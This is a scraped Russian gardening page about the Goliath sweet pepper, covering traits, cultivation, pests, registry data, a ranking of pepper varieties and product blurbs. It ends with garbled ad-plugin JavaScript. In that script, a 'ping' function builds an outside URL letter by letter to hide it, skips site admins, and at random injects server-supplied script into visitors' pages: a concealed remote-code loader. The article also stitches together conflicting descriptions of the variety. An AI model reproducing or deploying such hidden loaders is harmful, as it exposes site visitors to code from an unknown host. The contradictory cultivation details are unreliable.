60 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец голиаф фото отзывы

Характеристика сорта перцев Голиаф

Среди огромного разнообразия овощей сорт перца Голиаф очень востребован на рынке. Он заслужил признание, благодаря неприхотливости в уходе и высокой урожайности.

Характеристика сорта перцев Голиаф

Характеристика сорта Голиаф

Сорт перца Голиаф относится к гибридам первого поколения. Он устойчив ко многим болезням и дает хорошие урожаи даже при минимальном уходе. Собирать семена из его плодов для дальнейшей посадки нецелесообразно: они не сохраняет сортовые характеристики родителей.

Перец Голиаф F1 неприхотлив к климатическим условиям, подходит для выращивания в открытом грунте. Данный гибрид исключает использование теплиц и закрытых помещений для выращивания.

Описание куста

Среднеранний гибрид имеет сильный компактный куст с периодом созревания 70-75 дней от дня посадки рассады. Защиту от обжигающих летних лучей обеспечивает мощный листовой аппарат.

Растение имеет развитую корневую систему. Корневище находится близко к поверхности почвы, поэтому рыхлить ее нужно предельно аккуратно, чтобы не повредить его.

Листья темно-зеленые, с гладкой восковой поверхностью. Завязь начинает формироваться после 7-9 настоящего листка, а после — через каждые 2-3 узла.

Описание плода

У семян этого сорта высокая стоимость. В результате огородники и фермеры получают намного больше плодов, чем у обычных известных сортов. Проверенная производителями средняя урожайность с 1 куста составляет 11-12 плодов.

Основные характеристики сладкого перца Голиаф:

  • Плоды однородные, имеют коническую форму и размер 6 × 14 см. Средняя масса плода — 130-160 г, они имеют небольшую семенную камеру, что важно при переработке. Некоторые плоды достигают в длину 20 см.
  • Толщина стенки плода умеренно толстая — 7-8 мм. Это дает продукции дополнительное преимущество: толстые стенки овоща делают продукцию сочнее и вкуснее, а также возможность достаточно долгого хранения в замороженном виде.
  • Благодаря толстой стенке, плоды хорошо транспортируются на длительные расстояния и сохраняют товарный вид в течение длительного времени. Продукция может сохраняться 2-3 недели в сетке, в ящиках без потери товарного вида, формы и качественных характеристик.
  • В состоянии технической спелости плоды имеют зеленый окрас. С наступлением биологической он меняется на насыщенно-красный с белесым восковым налетом.
  • Период плодоношения стабильный и длительный. Если срезают плоды перед началом биологического созревания, они постепенно краснеют до нового года.

Посадка и уход за сортом Голиаф

Растения необходимо удобрять

Весь посадочный материал проходит предварительную дезинфекцию, поэтому дополнительно готовить семена перед посевом не надо. Молодые саженцы нуждаются в своевременном поливе и подкормке.

После пересадки рассады на постоянное место необходимо на несколько дней затенить грядки. В противном случае молодые саженцы могут получить ожоги листьев. Перед высадкой удаляют все соцветия и мелкие завязи. Это поможет растениям сохранить силы и лучше прижиться на новом месте.

Землю под посадку готовят заранее. Осенью требуется внесение части фосфорных, калийных удобрений, а весной — азотных. Остальные части вносят после высаживания рассады в фазе плодообразования и в период массового плодоношения. Мульчирование грунта черной пленкой ускоряет созревание плодов.

Вредители и болезни сорта Голиаф

В сравнении с сортовыми растениями, которые часто не в состоянии справится с заболеваниями, цена на данные семена соответствует инвестируемым средствам в удобрения и средства защиты растения. В то же время селекционные семена надежно защищены от распространенного в последние годы вируса табачной мозаики, бактериальной пятнистости и рака, альтернариоза, фитофтороза, серой гнили и черной ножки.

С целью дополнительной защиты от вредителей в междурядьях рассаживают базилик. Полукустарник является другом пасленовой культуры, выделяет вещества, стимулирующие рост.

Наибольшую опасность для кустов перца представляют слизни. При пасмурной и дождливой погоде они любят лакомиться плодами культуры. Для борьбы со слизнями листья и стебли опудривают древесным пеплом.

Плоды невероятно огромных размеров — перец Голиаф: полное описание сорта

С этим перцем отменных урожаев добьются даже овощеводы из областей со сложным и тяжелым климатом, где похолодания посреди лета – частое явление. Холодостойкий Голиаф специально выведен учеными-аграриями из Сибири, как адаптированный вид.

Описание и характеристика сорта

Сладкий перец Голиаф можно успешно выращивать в открытой почве, в теплицах с временным и постоянным укрытием. По срокам начала плодоношения сорт относится к среднеспелой линейке. Созревание начинается через 110-125 суток с момента прорастания сеянцев.

Перец Голиаф от известного оригинатора «Сибирский сад» представляет собой среднерослые растения. Побеги в кустах вырастают в длину на 70 см, располагаются полураскидисто. Им требуется формировка по мере роста и подвязка к столбикам.

Что следует знать о плодах перца болгарского Голиаф, их описание и характеристика:

  • средняя масса 250-400 г;
  • форма куба или усеченной призмы;
  • окраска насыщенно-рубиновая;
  • перикарпий сочный и мясистый (10 мм);
  • кожица с глянцевыми переливами.

У перцев презентабельный вид, высокие показатели товарности и вкуса. Они пользуются неизменным спросом на рынке. В салатах, закусках, горячих блюдах расходятся «на ура». Их консервируют, маринуют, морозят кусочками. Заготовки с этими перцами особенно вкусны и ароматны.

Преимущества и недостатки

  • крупноплодность;
  • товарность и транспортабельность;
  • хороший иммунитет к комплексу инфекций пасленовых;
  • отличный вкус как в свежем, так и в переработанном виде;
  • значительная продуктивность;
  • переносимость понижений температуры;
  • подходит для выращивания в открытых и укрывных участках;
  • хорошая плотная консистенция мякоти.

Минусы:

  • требовательность к регулярности поливов.

Урожайность

С 1 м2 грядки, где высажен Голиаф, снимают до 10 кг высокотоварных перцев.

Посадка

Посевные работы начинаются с середины февраля. Семена перед посадкой замачивают, затем дезинфицируют в марганцовке, перекиси или Фитоспорине.

Для стимулирования прорастания семенной материал выдерживают 6-7 часов в активаторе (Фитоспектр, Эпин, Иммуноцитофит). Сеют в увлажненный дерново-компостный грунт.

С появлением проростков рассаду ставят на свет, подключают фитолампы. В возрасте 60-65 суток пересаживают сеянцы в грядки. Схема размещения — 40 на 60 см.

Выращивание и уход

Перцам необходимы поливы до 2-3 раз в неделю в засушливое лето, при дождливом сезоне следят за подсыханием грядок. На следующий день после увлажнения проводят рыхление. Хороший эффект дает процедура окучивания.

Схема подкормок выглядит следующим образом:

  • спустя 12-14 суток после пересадки вносят азотные составы (карбамид, Азотовит), комплексные препараты;
  • при массовом цветении используют суперфосфат и комплексы (Агрикола, Чистый лист, Фертика);
  • при созревании удобряют 2-3 раза с интервалом 2 недели, в равных соотношениях применяют фосфорную и калийную соль.

Вредители и болезни сорта

Голиаф надежно защищен от распространенных патогенов. Он редко поражается ВТМ, фитофторозом, гнилями, альтернариозом, пятнистостями и раком.

Но вот от вредителей иммунитета у перца нет. Профилактическую обработку следует проводить от таких насекомых, как тля, листоеды, клещики, слизни. Для опрыскивания кустов применяют:

  • чесночный настой;
  • отвар луковой шелухи;
  • настои из горьких трав (полынь, лопух, одуванчик);
  • биопрепараты.

Голиаф — сорт растения Перец сладкий

Характеристики сорта:

Свойства сорта Голиаф:

Рекомендуемый регион на карте:

Информация о допуске Перец сладкий Голиаф из Реестра Госсорткомиссии РФ

Заявка на допуск №67069 , зарегистрирована 2015-04-21 . Сорт Перец сладкий Голиаф включен в реестр допущенных в 2015 году . Допущен к использованию в регионах: Все регионы .

Оригинатором сорта Перец сладкий Голиаф является:

  • ДЕДЕРКО ВЛАДИМИР НИКОЛАЕВИЧ

Информация о патенте на сорт Перец сладкий Голиаф

Патентообладатель сорта Голиаф:

  • ДЕДЕРКО ВЛАДИМИР НИКОЛАЕВИЧ

Заявка на охрану сорта Голиаф №67070 , зарегистрирована 2015-04-21 .

Патент №8194 , зарегистрирован 2016-01-12 . Расчетная дата окончания патента 2046-12-31 .

Авторы сорта Перец сладкий Голиаф
  • Угарова Светлана Викторовна
  • Дедерко Владимир Николаевич

Другие сорта растения Перец сладкий

Поиск сорта по названию
Подбор сорта
Вопрос экспертам портала

Если вы не нашли ответ на вопрос — не стесняйтесь, задайте вопрос эксперту.

Зарегистрируйтесь или Войдите, чтобы каждый раз не указывать Имя и Электронную почту

Спасибо за комментарий! Он будет опубликован после проверки модератором!

Комментариев еще нет, станьте первым!

Портал для тех, кто любит свою дачу

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Помогите нашему сайту развиваться!

Пожалуйста, прочитайте это обращение, оно не отнимет у вас много времени!

Нам так не хватает ваших комментариев и вопросов, чтобы понимать в каком направлении нам развиваться.

Не забудьте оставить комментарий, если вы нашли то что искали.
А если не нашли — задайте вопрос через форму «Спросить эксперта» в шапке сайта.
Мы ответим на этот вопрос, и другие посетители смогут найти ту информацию, которую не смогли найти вы.

С уважением,
команда портала Дача-Дача.ру

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

10 лучших сортов перцев для теплиц и открытого грунта на 2019 год

Перец считается довольно капризной овощной культурой, которая требует особого ухода в момент выращивания. Ежегодно агрофирмы предлагают овощеводам совершенно новые или улучшенные сорта гибридов. Некоторые из них отличаются устойчивостью к болезням и высокой всхожестью, другие более капризны, но имеют отличные вкусовые качества.

В наш рейтинг мы включили только лучшие сорта перцев на 2019 год, которые отличаются устойчивостью к заболеваниям и обладают отличным вкусом.

10. Калифорнийское чудо

Калифорнийское чудо” – один из самых востребованных огородниками и лучших сортов болгарского перца на сегодняшний день. Он относится к среднеспелым сортам и для полного его созревания потребуется порядка 100-130 дней. Средний куст вырастает в длину до 70 сантиметров и может дать до 10 плодов. Кубовидной формы плоды имеют ярко-красный с оттенком глянца цвет. Толщина стенок данного сорта составляет около 0,8 см. Семена хорошо всходят как в закрытом, так и на открытом грунте. Данный сорт получил множество положительных отзывов и пользуется популярностью.

9. Чардаш

Чардаш” – один из лучших ранних сортов перцев. Его полное созревание наступает через 95-100 дней. Кусты “Чардаш” имеют среднюю высоту – 70 сантиметров – и очень компактные. Плоды имеют конусовидную форму и довольно крупные, в массе могут достигать 220 гр. Один куст может приносить до 17 плодов красно-оранжевого цвета. Толщина стенок составляет примерно 0,6 см. Сорт себя отлично зарекомендовал среди овощеводов, благодаря высокой урожайности.

8. Багратион

Багратион” – ранний сорт перца, который чаще всего выбирают овощеводы для посадки. Высота декоративного растения достигает 1 метра и представляет собой раскидистый куст с жёлтыми плодами. Период технического созревания “Багратиона” составляет 100-110 дней. Он обладает высокой урожайностью, которая может достигать 10 кг на 1 кв. м. Вес зрелых плодов может достигать 200 гр., которые имеют толщину стенок от 0,5 до 0,8 см. Сорт имеет универсальное назначение и очень устойчив к заболеваниям. Выращивать его следует в теплицах. Как показывает практика, выращивание этого перца больше всего подходит для северных районов.

7. Адмирал Колчак F1

Адмирал Колчак F 1” – один из лучших среднеспелых гибридов. Вегетационный период созревания длится от 115 до 120 дней. Высота растения может достигать 80 см и имеет на кусте жёлтые плоды кубовидной формы с матовой поверхностью. Перец вырастает очень сочный, с ярко выраженным запахом и толщиной стенок до 1 см. Масса одного овоща достигает 250 гр. Сорт обильно и продолжительное время плодоносит. Он имеет универсальное назначение и может использоваться как для консервирования, так и употребления в свежем виде. Ценность “Адмирал Колчак F 1″ заключается в устойчивости ко многим заболеваниям.

6. Голиаф

Голиаф” – сладкий перец сибирской селекции также является одним из лучших сортов 2019 года. Может выращиваться как в открытом грунте, так и в теплицах. “Голиаф” представляет собой среднерослое растение, достигающее в высоту 70 сантиметров. Считается одним из самых крупноплодных. Плоды насыщенного красного цвета имеют призмовидную форму, толщина стенок которых составляет порядка 1 см. Масса овоща может достигать 400 гр. Перец очень хорошо плодоносит – урожай с одного куста может составлять до 13 штук. Также у “Голиафа” отличные вкусовые характеристики, он является сочным и мясистым. Может быть использован в универсальных целях.

5. Маркиз

Маркиз” – один из лучших гибридов раннего созревания с фиолетовыми плодами. Его можно растить как в теплицах, так и на открытых грядках. Полураскидистые кусты имеют высоту в пределах 90 сантиметров. Один куст способен приносить до 13 плодов. Период вегетации длится на протяжении 100-108 дней. Овощ кубовидной формы максимально может достигать в массе 150 гр., а толщина его стенок составляет примерно 0,8 см. На вкус перец очень сочный с ярко выраженным сладким вкусом. Также стоит отметить, что данный сорт устойчив к вирусу табачной мозаики.

4. Кардинал F1

Кардинал F 1“– один из лучших раннеспелых тепличных сортов, имеющий фиолетовый цвет. Период созревания с момента восхода семян составляет от 80 до 90 дней. Кусты, вырастающие до 1 метра, приносят крупные кубовидные плоды с массой до 250 гр. и толщиной стенок до 0,8 см. Сочные плоды имеют отличный вкус и пригодны для употребления как в свежем виде, так и для консервирования и домашней кулинарии. Растение устойчиво к болезням и хорошо плодоносит. С 1 кв. м. можно собрать урожай до 14 кг.

3. Сибирский Князь

Сибирский Князь” – один из самых высокоурожайных и раннеспелых сортов перца. Примерно через 106-114 дней наступает техническое созревание данного овоща. “Сибирский Князь” предназначен для посадки в открытом грунте под временным плёночным укрытием. Кусты “Сибирского князя” могут достигать 1,5 метров в вышину и нуждаются в подвязке. Зрелые плоды растения имеют красный цвет и представляют собой конусовидную форму. Их масса может достигать 150 гр, а стенки довольно тонкие и составляют лишь 0,4-0,5 см. Перец обладает отличными вкусовыми качествами: он очень вкусный и ароматный. Данный сорт отличается дружной отдачей урожая – все плоды созревают практически одновременно. Прекрасно подходит для универсального использования. С 1 кв.м. можно собрать до 4,5 кг овощей.

2. Оранжевое чудо F1

Оранжевое чудо F 1” – один из лучших раннеспелых гибридов болгарского перца для теплиц. Процесс технической спелости природного продукта длится около 90 дней. Высота кустиков может достигать 1,1 метра. Ярко-оранжевые кубовидные плоды в массе составляют примерно 250 грамм, а толщина их стенок примерно 1 сантиметр. Они обладают высокими вкусовыми качествами, очень сочные и мясистые. Урожайность во многом зависит от условий выращивания. Обычно с 1 кв. м. можно собрать до 14 килограмм овощей. Гибрид устойчив к вирусу табачной мозаики и может использоваться в домашней кулинарии, консервировании, а также для приготовления свежих салатов.

1. Подарок Молдовы

Подарок Молдовы” – самый популярный и лучший сорт болгарского перца. Отличительной особенностью плодового растения является его неприхотливость. Он способен приспосабливаться к любым почвенным и климатическим условиям. Период от всходов до технической зрелости может составлять 125-136 дней. Растение представляет собой кустик в высоту 50 сантиметров, который не требует подвязки. Конусовидные плоды с массой до 100 гр. имеют тонкие стенки толщиной до 0,5 см. Вкус у данного сорта сочный и сладкий. Также растение устойчиво ко многим вирусным заболеваниям и даёт хороший урожай – от 7 кг на 1 кв.м. Этот сорт получает высокие оценки от овощеводов.

Перец Голиаф

Увеличивает всхожесть семян, особенно некондиционных. укореняет рассаду, черенки, одно- и многолетники, хвойные. защищает от биотических и абиотических стрессов, предотвращает опадение завязей, плодов. снижает фитофтороз картофеля и томатов, пероноспороз огурцов, паршу картофеля и яблони, бактериоз, фузариоз, корневые гнили, особенно серую гниль земляники, мучнистую росу роз и чёрной смородины, монилиоз косточковых и т.д. Уменьшает норму ядохимикатов при совместном введении.
В одном миллилитре содержится 33-38 капель.

Стойка аллюминиевая для фитолампы, 2 подвеса

Ключ для сборки входит в комплектацию.

Фитолампа Фотосинтез 15.

Предназначена для досвечивания растений в условиях недостаточной освещенности.

Лампа излучает свет, который усваивается растением на 90%. Красный свет для роста вегетативной массы, синий для формирования корней и цветов.

Характеристики:

Номинальная мощность, (Вт): 15
Фактическое энергопотребление, (Вт): 5
Напряжение, (В): 85- 265
Цоколь: Е27
Светоотдача: 300 LM
Длина красно спектра, (nm): 630-650
Длина синего спектра, (nm):450-460
Температура эксплуатации, (C): -10- +40
КПД, (%): 90
Срок службы (ч): 50000. Гарантия: 1 год.

Внимание! Рёбра теплообменника нагреваются во время работы, не закрывайте его.

Не разбирать, не давать детям. Утилизировать с бытовыми отходами.

Высокоурожайный раннеспелый гибрид для выращивания в защищённом и открытом грунте. Высота растения 60-80 см. Гигантские плоды удлинённо-кубовидной формы, достигают длины 26 см, толстостенные, очень сладкие, сочные, нежные.

Салатом, приготовленным из одного перца, можно накормить всю семью. Используется в свежем виде, прекрасно подходит для всех видов консервирования.

Раннеспелый, устойчивый к неблагоприятным условиям сорт. Растение компактное, малооблиственное, высотой 45-50 см, с букетным плодоношением и дружным созреванием многочисленных плодов. Плоды вверхторчащие, призмовидные, в технической спелости светло-кремовые, в биологической ярко-красные. Масса 100-130 г, толщина стенки 7-8 мм. Ценность сорта: интенсивное плодоношение и дружное созревание раннего урожая, высокие товарные и технологические качества. Сорт рекомендуется для выращивания в открытом грунте и пленочных теплицах.

Посев на рассаду производят за 60-70 дней до высадки растений на постоянное место. Оптимальная постоянная температура прорастания семян 26-28град. При высадке в грунт на 1 кв. м размещают 3-5 растений. Сорт хорошо реагирует на полив и подкормки комплексными минеральными удобрениями.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};